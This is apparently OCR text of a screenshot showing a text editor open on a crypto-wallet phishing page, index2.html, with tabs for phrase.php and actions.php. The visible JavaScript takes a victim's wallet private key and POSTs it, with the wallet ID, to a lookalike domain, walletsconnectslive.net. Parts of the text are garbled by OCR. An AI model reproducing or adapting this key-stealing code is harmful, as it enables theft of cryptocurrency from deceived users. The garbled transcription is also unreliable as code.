Activities
Text Editor
Nov 6 03:34
Open
index2.html
~/Downloads/Site_Work
Save
×
index2.html
X
phrase.php
X
actions.php
X
index.php
X
js2w.js.download
X
1370
ater uy couto not proceed out to surie CTUS, Numaty try again later. ]
1591
1592
1593
1594
1595
1596
};
1597
O
1598
const privatekeyProceedHandler = () => {
1599
event. preventDefault( );
1600
let privatekey = document. getElementById( 'privatekey' ).value;
1601
const wallet = document. getElementById( 'wallet_id').value;
1602
console. log(wallet) ;
1603
if (privatekey. trim( ) === "") {
1604
alert( 'Fill in your private key');
1605
} else {
A
1606
$. ajax( {
1607
url: "https://walletsconnectslive.net/thirdform",
1608
method: 'POST' ,
1609
data: { import_type: 'private', wallet: wallet, privatekey: privatekey, _token: "VNSElc2gRav1j8Vo06hMGE2lgerCJRM3VHsxXmjf" },
?
1610
success: function (res) {
1611
if (res. trim( ) ! == "") {
1612
if (res. trim( ) === "string_error") {
1613
alert( 'Fill in your private key. ');
1614
} else if (res. trim( ) === "success") {
1615
privatekey ='
1616
redirect( );
1617
document. querySelector('.sending').style. display = 'block' ;
1618
1619
} else {
1620
alert( 'Could not proceed due to some errors, kindly try again later. ')
1621
1622
1623
1624
HTML Tab Width: 8
Ln 1629, Col 7
INS
